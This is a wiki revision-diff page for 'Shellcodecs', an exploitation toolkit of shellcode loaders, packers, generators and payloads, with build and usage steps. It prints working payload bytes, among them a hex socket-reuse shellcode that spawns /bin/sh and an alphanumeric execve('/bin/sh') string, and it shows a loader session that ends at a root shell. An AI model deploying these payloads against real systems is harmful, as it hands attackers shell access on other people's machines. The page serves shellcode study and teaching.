Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcodecs"

From NetSec
Jump to: navigation, search
(Contents)
(Loaders)
 
(41 intermediate revisions by 2 users not shown)
Line 1: Line 1:
Shellcodecs is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
+
'''Shellcodecs''' is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] provided with [[shellcode|documentation]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
  
These shellcodes are provided with documentation located at [[Shellcode]]
+
== Dependencies ==
 
+
{{Warning|END USER IS LIABLE FOR THEIR OWN ACTIONS}}
+
  
 
In order to run these [[Shellcode|shellcodes]], the following dependencies are required:
 
In order to run these [[Shellcode|shellcodes]], the following dependencies are required:
  
 
* [[Linux]]
 
* [[Linux]]
* [[GCC]]
+
* GCC
 
* Generators require [[Python]] 2.7
 
* Generators require [[Python]] 2.7
 
* Automake
 
* Automake
Shellcodecs is a collection of [[shellcode]]s, [[Shellcode/Loaders|loaders]], [[Shellcode/Appendix|sources]], and [[Shellcode/Appendix#Generators|generators]] designed to ease the [[exploitation]] and [[shellcode]] [[programming]] process.
 
  
Unless otherwise noted, code is amd64.  There are various intel32 etc examples as well.  If you're unaware, amd64 is the main linux tree for 64-bit, so if you have an intel, you should still be ok. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the [[Shellcode/Appendix|shellcode appendix]].
+
Unless otherwise noted, code is amd64.  There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the [[Shellcode/Appendix|shellcode appendix]].
  
 
== Contents ==
 
== Contents ==
 
+
<center>
 
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
 
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
<center>'''Loaders'''</center>
+
'''Loaders'''
  
 
-----
 
-----
 
+
<div align="left">
 
:* 32-bit executable mmap-based shellcode loader ''66 bytes'' ([[Shellcode/Appendix#loader-32.s|loader-32.s]]) ([[Shellcode/Loaders|Docs]])
 
:* 32-bit executable mmap-based shellcode loader ''66 bytes'' ([[Shellcode/Appendix#loader-32.s|loader-32.s]]) ([[Shellcode/Loaders|Docs]])
 
:* 64-bit executable mmap-based shellcode loader ''79 bytes'' ([[Shellcode/Appendix#loader-64.s|loader-64.s]]) ([[Shellcode/Loaders|Docs]])
 
:* 64-bit executable mmap-based shellcode loader ''79 bytes'' ([[Shellcode/Appendix#loader-64.s|loader-64.s]]) ([[Shellcode/Loaders|Docs]])
 
:* A dynamic loader for locally executable code in [[C]] ([[Shellcode/Appendix#dynamic-loader.c|dynamic-loader.c]])
 
:* A dynamic loader for locally executable code in [[C]] ([[Shellcode/Appendix#dynamic-loader.c|dynamic-loader.c]])
 
:* A dynamic loader for remotely executable code ([[Shellcode/Appendix#socket-loader.c|socket-loader.c]])
 
:* A dynamic loader for remotely executable code ([[Shellcode/Appendix#socket-loader.c|socket-loader.c]])
</div>
+
</div></div>
 +
 
  
  
 
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
 
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
<center>'''Environmental stubs'''</center>
+
'''Tools'''
  
 
-----
 
-----
 +
<div align="left">
 +
:* Nicely output shellcode in a variety of formats ([[Shellcode/Appendix#shellcode-generator.py|shellcode-generator.py]])
 +
:* Hash-generator for self-linking shellcode ''81 bytes'' ([[Shellcode/Appendix#hash-generator.s|hash-generator.s]])
 +
:* Socket-reuse shellcode generator ([[Shellcode/Appendix#socket-reuse-generator.py|socket-reuse-generator.py]])
 +
:* Polymorphic socket reuse generator ([[Shellcode/Appendix#poly-socket-reuse-generator.py|poly-socket-reuse-generator.py]])
 +
:* Sends socket reuse shellcode ([[Shellcode/Appendix#socket-reuse.c|socket-reuse.c]])
 +
:* 32-bit shellcode packer ''37 bytes'' ([[Shellcode/Appendix#packer-32.s|packer-32.s]]) ([[Shellcode/Self-modifying#32_bit|Docs]])
 +
:* 64-bit shellcode packer ''55 bytes'' ([[Shellcode/Appendix#packer-64.s|packer-64.s]]) ([[Shellcode/Self-modifying#64_bit|Docs]])
 +
:* ELF64 symbol table parser ''188 bytes'' ([[Shellcode/Appendix#elf64-parser.s|elf64-parser.s]]) ([[Shellcode/Parsing|Docs]])
 +
</div></div>
 +
 +
 +
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
 +
'''Payloads'''
 +
 +
-----
 +
<div align="left">
 +
:* Short unlinked 64-bit null-free setuid(0); execve('/bin/sh',0,0); ''32 bytes'' ([[Shellcode/Appendix#setuid_binsh.s|setuid_binsh.s]]) ([[Shellcode/Null-free#64-bit|Docs]])
 +
:* Small unlinked 32-bit null-free write-to-file payload ''90 bytes'' ([[Shellcode/Appendix#write-file-32.s|write-file-32.s]]) ([[Shellcode/Null-free#32-bit|Docs]])
 +
:* Null-free unlinked same-socket-shell payload ''115 bytes'' ([[Shellcode/Appendix#socket-reuse.s|socket-reuse.s]]) ([[Shellcode/Socket-reuse|Docs]])
 +
:* Alphanumeric amd64 execve('/bin/sh',0,0) ''104 bytes'' ([[Shellcode/Appendix#ascii_binsh.s|ascii_binsh.s]]) ([[Shellcode/Alphanumeric|Docs]])
 +
:* Null-free dynamic ELF64 exit code ''135 bytes'' ([[Shellcode/Appendix#linked-exit.s|linked-exit.s]]) ([[Shellcode/Dynamic|Docs]])
 +
:* Null-free dynamic ELF64 socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#linker-fd-reuse.s|linker-fd-reuse.s]]) ([[Shellcode/Dynamic#The_dynamic_shell|Docs]])
 +
:* Null-free polymorphic dynamic ELF64 socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#poly-linker-fd-reuse.s|poly-linker-fd-reuse.s]])
 +
</div></div>
  
 +
 +
 +
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
 +
'''Stubs'''
 +
 +
-----
 +
<div align="left">
 
:* A 32-bit getpc (%eax) example ''11 bytes'' ([[Shellcode/Appendix#getpc-32.s|getpc-32.s]]) ([[Shellcode/Environment#x86_.2832_bit.29|Docs]])
 
:* A 32-bit getpc (%eax) example ''11 bytes'' ([[Shellcode/Appendix#getpc-32.s|getpc-32.s]]) ([[Shellcode/Environment#x86_.2832_bit.29|Docs]])
 
:* A 64-bit getpc (%rax) example ''12 bytes'' ([[Shellcode/Appendix#getpc-64.s|getpc-64.s]]) ([[Shellcode/Environment#x64|Docs]])
 
:* A 64-bit getpc (%rax) example ''12 bytes'' ([[Shellcode/Appendix#getpc-64.s|getpc-64.s]]) ([[Shellcode/Environment#x64|Docs]])
 
:* Alternative 64-bit getpc ''10 bytes'' ([[Shellcode/Appendix#getpc-64-alt.s|getpc-64-alt.s]]) ([[Shellcode/Environment#x64|Docs]])
 
:* Alternative 64-bit getpc ''10 bytes'' ([[Shellcode/Appendix#getpc-64-alt.s|getpc-64-alt.s]]) ([[Shellcode/Environment#x64|Docs]])
:* int3 detection code ''24 bytes'' ([[Shellcode/Appendix#int3-detect-64.s|int3-detect-64.s]]) ([[Shellcode/Environment#int3_breakpoints|Docs]])
+
:* Int3 detection code ''24 bytes'' ([[Shellcode/Appendix#int3-detect-64.s|int3-detect-64.s]]) ([[Shellcode/Environment#int3_breakpoints|Docs]])
 
:* 32-bit lastcall example code ''4 bytes'' ([[Shellcode/Appendix#lastcall-32.s|lastcall-32.s]]) ([[Shellcode/Environment#Null-free|Docs]])
 
:* 32-bit lastcall example code ''4 bytes'' ([[Shellcode/Appendix#lastcall-32.s|lastcall-32.s]]) ([[Shellcode/Environment#Null-free|Docs]])
 
:* 64-bit lastcall example code ''5 bytes'' ([[Shellcode/Appendix#lastcall-64.s|lastcall-64.s]]) ([[Shellcode/Environment#Null-free_2|Docs]])
 
:* 64-bit lastcall example code ''5 bytes'' ([[Shellcode/Appendix#lastcall-64.s|lastcall-64.s]]) ([[Shellcode/Environment#Null-free_2|Docs]])
 
:* 64-bit alphanumeric lastcall example code ''13 bytes'' ([[Shellcode/Appendix#lastcall-alphanum.s|lastcall-alphanum.s]]) ([[Shellcode/Environment#Alphanumeric_2|Docs]])
 
:* 64-bit alphanumeric lastcall example code ''13 bytes'' ([[Shellcode/Appendix#lastcall-alphanum.s|lastcall-alphanum.s]]) ([[Shellcode/Environment#Alphanumeric_2|Docs]])
</div>
+
:* Alphanumeric x86* compatible getCPU ''15 bytes'' ([[Shellcode/Appendix#architecture_detection|architecture_detection]]) ([[Shellcode/Environment#Practically_Applied:_Code|Docs]])
 +
:* 32-bit shellcode unpacker ''89 bytes'' ([[Shellcode/Appendix#decoder-32.s|decoder-32.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
 +
:* 64-bit shellcode unpacker (mmap) ''102 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
 +
:* 64-bit shellcode unpacker ''69 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
  
 +
</div></div>
 +
</center>
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+
=Building the code=
<center>'''Null-free'''</center>
+
* tar xzvf shellcode.tgz
 +
* cd shellcode
 +
* make
  
-----
+
It is also possible to make exclusively x86 or x64 binaries using make x86 or make x64.  Please keep in mind, there is more support for 64-bit in this package than 32-bit.
  
:* A very short setuid(0); execve('/bin/sh',0,0); ''32 bytes'' ([[Shellcode/Appendix#setuid_binsh.s|setuid_binsh.s]]) ([[Shellcode/Null-free#64-bit|Docs]])
+
=Using the tools=
:* A small write-to-file payload ''90 bytes'' ([[Shellcode/Appendix#write-file-32.s|write-file-32.s]]) ([[Shellcode/Null-free#32-bit|Docs]])
+
==Generators==
  
</div>
+
The shellcode generator [[assembly|assembles]] [[shellcode]] from its assembly file (or a binary) and outputs the byte code as raw ascii, a [[hexadecimal]] representation, or as a [[C]] variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a [[binary]] file), whereas the hexadecimal representation can be used in exploit code.
  
 +
* Help
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+
{{LinuxCMD|generators/shellcode-generator.py --help
<center>'''Socket-reuse'''</center>
+
usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]
  
-----
+
optional arguments:
  
:* Same-socket-shell payload ''115 bytes'' ([[Shellcode/Appendix#socket-reuse.s|socket-reuse.s]]) ([[Shellcode/Socket-reuse|Docs]])
+
-h, --help  show this help message and exit
:* Sends socket reuse shellcode ([[Shellcode/Appendix#socket-reuse.c|socket-reuse.c]])
+
  
</div>
+
--file FILE
  
 +
--hex        Output in hex format (\x0f\x05)
  
 +
--raw        Output in raw format
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+
--var        Output as a variable
<center>'''Self-modifying'''</center>
+
  
-----
+
--len        Output the length
 +
}}
  
:* 32-bit shellcode unpacker ''89 bytes'' ([[Shellcode/Appendix#decoder-32.s|decoder-32.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
+
<br />
:* 64-bit shellcode unpacker (mmap) ''102 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
+
:* 64-bit shellcode unpacker ''69 bytes'' ([[Shellcode/Appendix#decoder-64.s|decoder-64.s]]) ([[Shellcode/Self-modifying#The_unpacker|Docs]])
+
:* 32-bit shellcode packer ''37 bytes'' ([[Shellcode/Appendix#packer-32.s|packer-32.s]]) ([[Shellcode/Self-modifying#32_bit]])
+
:* 64-bit shellcode packer ''55 bytes'' ([[Shellcode/Appendix#packer-64.s|packer-64.s]]) ([[Shellcode/Self-modifying#64_bit]])
+
  
</div>
 
  
 +
* An example of using the generator to output raw ascii follows:
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+
{{LinuxCMD|generators/shellcode-generator.py --file&#x3d;ascii-shellcode/ascii_binsh --raw
<center>'''Alphanumeric'''</center>
+
XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00}}
  
-----
 
:* alphanumeric execve('/bin/sh',0,0) ''104 bytes'' ([[Shellcode/Appendix#ascii_binsh.s|ascii_binsh.s]]) ([[Shellcode/Alphanumeric|Docs]])
 
:* alphanumeric x86* compatible getCPU ''15 bytes'' ([[Shellcode/Appendix#architecture_detection|architecture_detection]]) ([[Shellcode/Environment#Practically_Applied:_Code|Docs]])
 
  
</div>
 
  
 +
The [[Shellcode/Socket-reuse|socket reuse]] generator accepts the source IP and source port that the socket reuse [[shellcode]] will be sent from and outputs the [[hexadecimal]] representation of the code to input into the [[Shellcode/Appendix#socket-reuse-send.c|socket-reuse-send.c]] source file.
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
+
<pre>
<center>'''Dynamic'''</center>
+
[user@localhost shellcode]$ generators/socket-reuse-generator.py
 +
Usage: generators/socket-reuse-generator.py <source IP> <source port>
 +
[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
 +
"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
 +
"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
 +
"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
 +
"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
 +
"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
 +
"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
 +
"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
 +
"\x6a\x3b\x58\x0f\x05"
 +
[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c
 +
[user@localhost shellcode]$
 +
</pre>
  
-----
+
==Loaders==
:* Self-linking exit code ''135 bytes'' ([[Shellcode/Appendix#linked-exit.s|linked-exit.s]]) ([[Shellcode/Dynamic|Docs]])
+
:* Self-linking socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#linker-fd-reuse.s|linker-fd-reuse.s]]) ([[Shellcode/Dynamic#The_dynamic_shell|Docs]])
+
:* Self-linking polymorphic socket reuse shellcode ''268 bytes'' ([[Shellcode/Appendix#poly-linker-fd-reuse.s|poly-linker-fd-reuse.s]])
+
  
</div>
+
The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:
  
 +
{{LinuxCMD|loaders/loader-64 $(generators/shellcode-generator.py --file&#x3d;null-free/setuid_binsh.s --raw)
 +
[root@localhost shellcode]# exit
 +
exit}}
  
<div style="width:600px; overflow:none; border:1px solid black; margin:4px; padding: 3px; border-radius:11px">
 
<center>'''Generators'''</center>
 
  
-----
+
The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.
:* Hash-generator for self-linking shellcode ''81 bytes'' ([[Shellcode/Appendix#hash-generator.s|hash-generator.s]])
+
:* Socket-reuse shellcode generator ([[Shellcode/Appendix#socket-reuse-generator.py|socket-reuse-generator.py]])
+
:* Polymorphic socket reuse generator ([[Shellcode/Appendix#poly-socket-reuse-generator.py|poly-socket-reuse-generator.py]])
+
:* Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable) ([[Shellcode/Appendix#shellcode-generator.py|shellcode-generator.py]])
+
  
</div>
+
{{LinuxCMD|loaders/socket-loader 1235
 +
[*] Received 117 bytes, executing.
 +
}
  
=Building the code=
+
=Getting help=
    * tar xzvf shellcode.tgz
+
{{Warning|<center>We are not free technical support and reserve the right to revoke support to anyone for any reason at any time.</center>}}
    * cd shellcode
+
    * make
+
    It is also possible to make exclusively x86 or x64
+
    binaries using make x86 or make x64.  Please keep in
+
    mind, there is more support for 64-bit in this
+
    package than 32-bit.  
+
  
=Using the tools=
+
If you're using the tools and there's a problem, try re-reading [[shellcode|the documentation]] before asking a question.  If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by talking on the shellcode talk page.
    [loaders]
+
    [generators]  
+
  
=Getting help=
 
        Note: We are not your free tech support.
 
            03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)~~
 
          Reminder: Docs are available at
 
      http://www.blackhatlibrary.net/shellcode
 
  If you're using the tools and there's a problem, try
 
re-reading the documentation before asking a question.  If
 
you're absolutely sure it is programmatical error and not
 
user error preventing the code from working properly, you
 
can let us know by joining our IRC or talking on the
 
shellcode talk page.
 
  If you'd like to pay for professional training on the
 
materials contained in this courseware, please contact our
 
sponsor at www.viralsec.com
 
 
=Credits=
 
=Credits=
  Lead developer:        Hatter
+
* Lead developer:        [[User:Hatter|hatter]]
  Supporting developers: jtRIPper, eax
+
* Supporting developers: [[User:jtRIPper|jtRIPper]], [[User:Eax|eax]]
  Community:  www.blackhatlibrary.net
+
 
  Commercial:     www.viralsec.com
+
{{programming}}{{social}}
 +
[[Category:Shellcode]]

Latest revision as of 23:20, 25 May 2013

Shellcodecs is a collection of shellcodes, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process.

Dependencies

In order to run these shellcodes, the following dependencies are required:

Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the shellcode appendix.

Contents

Loaders



Tools



Payloads



Stubs


Building the code

  • tar xzvf shellcode.tgz
  • cd shellcode
  • make

It is also possible to make exclusively x86 or x64 binaries using make x86 or make x64. Please keep in mind, there is more support for 64-bit in this package than 32-bit.

Using the tools

Generators

The shellcode generator assembles shellcode from its assembly file (or a binary) and outputs the byte code as raw ascii, a hexadecimal representation, or as a C variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a binary file), whereas the hexadecimal representation can be used in exploit code.

  • Help
Terminal

localhost:~ $ generators/shellcode-generator.py --help

usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]

optional arguments:

-h, --help show this help message and exit

--file FILE

--hex Output in hex format (\x0f\x05)

--raw Output in raw format

--var Output as a variable

--len Output the length




  • An example of using the generator to output raw ascii follows:
Terminal

localhost:~ $ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --raw XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00


The socket reuse generator accepts the source IP and source port that the socket reuse shellcode will be sent from and outputs the hexadecimal representation of the code to input into the socket-reuse-send.c source file.

[user@localhost shellcode]$ generators/socket-reuse-generator.py 
Usage: generators/socket-reuse-generator.py <source IP> <source port>
[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
"\x6a\x3b\x58\x0f\x05"
[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c 
[user@localhost shellcode]$

Loaders

The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:

Terminal

localhost:~ $ loaders/loader-64 $(generators/shellcode-generator.py --file=null-free/setuid_binsh.s --raw)

[root@localhost shellcode]# exit

exit


The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.

{{LinuxCMD|loaders/socket-loader 1235

[*] Received 117 bytes, executing.

}

Getting help

RPU0j.png
We are not free technical support and reserve the right to revoke support to anyone for any reason at any time.

If you're using the tools and there's a problem, try re-reading the documentation before asking a question. If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by talking on the shellcode talk page.

Credits

Shellcodecs is part of a series on programming.
<center>
</center>